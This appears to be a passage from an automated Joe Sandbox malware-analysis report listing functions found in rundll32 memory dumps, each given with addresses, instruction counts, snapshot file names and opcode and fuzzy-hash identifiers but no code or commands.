                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9ad3965d35f38f9e6de05c0213210afa01e3a8fdc48cfa2f35ed6c260dd25618
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6dadbf845094f4bc84a26c6f4a254077e9a4c4266812a67466fa2ab9801824a1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ad3965d35f38f9e6de05c0213210afa01e3a8fdc48cfa2f35ed6c260dd25618
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D371B635B10214DFDB549FB9CC54AAE7AE7EFC8200F158429E606EB3A4DE71DC428791
                                                                                                                                                                                                                                                                                                                                    Function 06DF2644 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b6f7246223fc19e9ddea3039315ca5d55700ff7e7107a782ad5233400abf327b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c53ff0b480742851962ed03915eda8699192a88f3cdcb73f5d2f85fe273150c7
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6f7246223fc19e9ddea3039315ca5d55700ff7e7107a782ad5233400abf327b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A312C21B293548BDBA52BB5981477E7FEBCF85350F0684BADA42CB38ADD64CD0143A1
                                                                                                                                                                                                                                                                                                                                    Function 06DF0C1C Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c9df575b7ab0c5f562d31e3220a944ff4c5265da29d96e3e6270b96fd8cc1311
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 407aca5bea6721d6fc444c443ea210f1d923d59486c75f1c9e769a832428f052
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9df575b7ab0c5f562d31e3220a944ff4c5265da29d96e3e6270b96fd8cc1311
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3313630B192449FD7956B398C203AE7FF69FCA310F16846EDA42EB386CD344C0483A1
                                                                                                                                                                                                                                                                                                                                    Function 06DF2764 Relevance: .4, Instructions: 394COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cf20cdb563b5f7ce366908722c555f10db2570c9692b792a8fb80a0845e38ee0
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8c5e4dad6ac2fe90592347bfa3e3cd300ec33302c31f201380f907878ce80880
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf20cdb563b5f7ce366908722c555f10db2570c9692b792a8fb80a0845e38ee0
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEE06570C19204DFD794DFA99501696BFF1FF5531472186BEC888E2214E7328603CB91
                                                                                                                                                                                                                                                                                                                                    Function 06DF23B8 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: fff719478d2746f0e94314e49f79d0bf8f5c2ac4518901a9fb4e76175a80817e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 429fcce9b3cbc51af4da071f3b0649c1639e0349b3787b03a2ac1ce20c0b2a86
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fff719478d2746f0e94314e49f79d0bf8f5c2ac4518901a9fb4e76175a80817e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE510330B21205CFC750CFA8D89496ABBF5FF48304B1681A6E618DB366DB71DE41CB90
                                                                                                                                                                                                                                                                                                                                    Function 06DF2268 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d671758dea27dc7dd3eaed0a25d4d98d9a279cd3004bd6ef1d1622fbefdfd986
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 97c90b62624e55994cd5e35e24525509473d21e5f8ee9f809fd7b0d2369225a1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d671758dea27dc7dd3eaed0a25d4d98d9a279cd3004bd6ef1d1622fbefdfd986
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A413A75B101149FCB54DFA8D98099EBBF6FF88710B118169EA05EB364DB31DD41CBA0
                                                                                                                                                                                                                                                                                                                                    Function 06DF2664 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8318fe01b0c7433d0f19970d2af1470a4d78acb2628372785d7422a4c84ed82c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 227cb1b3d7064dd1b9985e6c02897fda494ae2edefade52078af48a2b101c602
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8318fe01b0c7433d0f19970d2af1470a4d78acb2628372785d7422a4c84ed82c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03214931A65314DFC3412BEAA8243EA7FA8DF42320F168877EF9896251DD24898583A1
                                                                                                                                                                                                                                                                                                                                    Function 06DF1050 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 984403599e2024d09bc91f97e17221ed61126afb1d643fd32fcb6cb1898f7f5d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 66679cdaa053c8f0f7f712fd345a4be5ed40f3f0baa7245509ef6f1b44ad680c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 984403599e2024d09bc91f97e17221ed61126afb1d643fd32fcb6cb1898f7f5d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51213631B10354DBDB509F69DC50AEABBEADF88214F05407ADA42D7349EE70C906C7A0
                                                                                                                                                                                                                                                                                                                                    Function 06DF1BB0 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d46beef3b271a18cb55076033778115130082c4e8c25299a46ff92ea3f0ab30a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 152a89c1f809746a518a93af92781103a5b714b9ca3de531316ab31be611da05
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d46beef3b271a18cb55076033778115130082c4e8c25299a46ff92ea3f0ab30a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A113A34718394EFC7A61B3A4C5036B7FAAEF82350F0A44AEDEC18B356DE205801C3A5
                                                                                                                                                                                                                                                                                                                                    Function 06DF0F30 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ccd065df08eec17bf716eda0dc4f33eb5d21f5c5dca41ee74918203c491c7650
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8b7d3127b93e5b12877519a35f4174b8db0137b51dbd6c7583853e8accf40bff
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccd065df08eec17bf716eda0dc4f33eb5d21f5c5dca41ee74918203c491c7650
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C11363021E398CFC7822B399C3159ABFB8DF462107164CEADA89CF243C9148846C3A6
                                                                                                                                                                                                                                                                                                                                    Function 06DF2258 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0f64682cecc248ca0f0f2e465d70e15d80802a91ea5ecd3099ef8e6bdb7b04b3
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1ef58c10555450c0e63cee43a739973fa295de0411ed62fe26310f3bcb33a8d1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f64682cecc248ca0f0f2e465d70e15d80802a91ea5ecd3099ef8e6bdb7b04b3
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E211A75E10218AFCB54DFA9D8859DEBBF5FF4C710B11812AE915E7320DB319941CBA0
                                                                                                                                                                                                                                                                                                                                    Function 06DF0F20 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b1f6d7b8acd0e457a087b6d2322fa401af5e284899156a12b304d0616bf80934
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e5ee6c1087085651796afeffc3f5c9a82a24fc184f5522b6e8c8a247eb5312fe
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1f6d7b8acd0e457a087b6d2322fa401af5e284899156a12b304d0616bf80934
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5014E35B29354ABCB9557792C6462BAF5A9FC6210F16447AEB19CB305DD258C00C2F1
                                                                                                                                                                                                                                                                                                                                    Function 06DF1378 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1946892f2c8a9b3eb26007c052b85c7d5de00cb492983ada4d0b7fe22478a6cc
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: aaba9cf77c12e63866f928e4d1ecc95ef7315088a08c6c0a77e9383749c1725e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1946892f2c8a9b3eb26007c052b85c7d5de00cb492983ada4d0b7fe22478a6cc
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C2104B1D00249CEDB10DFAAC880AEEFBF4EF48324F10852AD55967250C7756945CFA1
                                                                                                                                                                                                                                                                                                                                    Function 06DF1380 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d24b8bce348952cfe137c630bda8bd432a4f5867a31c930342bc5527ee6c46cd
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 849cbd50942de3b1aeef5bb01aff97ee2b46defc0fdba7003cd56386deeb910d
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d24b8bce348952cfe137c630bda8bd432a4f5867a31c930342bc5527ee6c46cd
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E711E0B1D04249CADB10DFAAC880AAEFBF4FB88324F10842AD55967250CB746945CFA5
                                                                                                                                                                                                                                                                                                                                    Function 06DF0F40 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3e7087f70df9d93d9ca7e54afb4d88235dfc71c3645c19ebff225965a74235aa
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 278bc07d8198ebbc84d07e924ef4902ad46b3623e2d53653784b8a2a6142b560
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e7087f70df9d93d9ca7e54afb4d88235dfc71c3645c19ebff225965a74235aa
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7001F730258348CFE3956B65DC65769BBF1EF80300F254C99EA8ACB7D5CA219880C756
                                                                                                                                                                                                                                                                                                                                    Function 06DF1829 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 273cc52bc2263c1ba172c4df78d1f07bcd72c78e9b6580bddb82166d42c0b4b4
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: fcfb4b71febbe8cb64b874d4c8ab805eb86bed7f586770eef25b3b5526659309
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 273cc52bc2263c1ba172c4df78d1f07bcd72c78e9b6580bddb82166d42c0b4b4
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D018431A10118B7E764AB6989647AF7AAA9B88604F12402DE611B7384CE754C0487F1
                                                                                                                                                                                                                                                                                                                                    Function 06DF1968 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 48c36b1e87ef9556a8442c4f48ad9943352750a4a0c781bc3a6bc1d07d17716a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: fde8e5fcd763f0ad1ed25740750d89b0d1333dd1599ffed9b3a6379d16d92825
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48c36b1e87ef9556a8442c4f48ad9943352750a4a0c781bc3a6bc1d07d17716a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B115135A04205EFCB44DF69E858AA97BB7EF8C314F145019E60AE7394CF769C45CB90
                                                                                                                                                                                                                                                                                                                                    Function 0481D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1682875777.000000000481D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0481D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_481d000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 035eb27ef06bd27eb73c6724b7701178f938df6ea1f4472ff5dd8d1397b572f7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6b8708efee13f2b8211d0f9c9a029157f658cba5a3b2e5facec42b68c1c1fb7f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 035eb27ef06bd27eb73c6724b7701178f938df6ea1f4472ff5dd8d1397b572f7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E601F7715083049AE7109E29E984767BFDCDF41324F08CA2BED488A256C279B841C6B1
                                                                                                                                                                                                                                                                                                                                    Function 0481D007 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1682875777.000000000481D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0481D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_481d000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2e1ce52619778c9120df305b2a86829937c3e65b7e7147578bcc49e1c7e87010
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e054b6acfe9e05cf2e7da4fd610baee1ce8b98528b2b67bffed21e74f7184025
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e1ce52619778c9120df305b2a86829937c3e65b7e7147578bcc49e1c7e87010
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4001526140D3C09ED7124B259894752BFB4DF53224F19C5CBD9888F1A3C2696849C772
                                                                                                                                                                                                                                                                                                                                    Function 06DF1440 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 47fa99edd87b4dbf41f26a94f06e371478957475301e7eccfba8598c3e6b3b14
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 160f8597c4142934d90aa9a98d280ea49fd9c36e76e3c82b43bdb335afd8c7be
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47fa99edd87b4dbf41f26a94f06e371478957475301e7eccfba8598c3e6b3b14
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5401F930A2A345DFC7095F796D351173FEADEC521430A18AAC305CF2A6E9258448CBE1
                                                                                                                                                                                                                                                                                                                                    Function 06DF1431 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a0cee6e61694440bcba1cd5b6ebdb2cbe14c8f1ffa621adc3854a4817a178702
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e36d930de80e595e167b883011edd1013580ce004f0372ccc34622106750c34
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0cee6e61694440bcba1cd5b6ebdb2cbe14c8f1ffa621adc3854a4817a178702
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79F0F630A55205DFC7499FBAA9251177FDBEFC5218306186EC745CF2A5EA358444CBD0
                                                                                                                                                                                                                                                                                                                                    Function 06DF2AA5 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
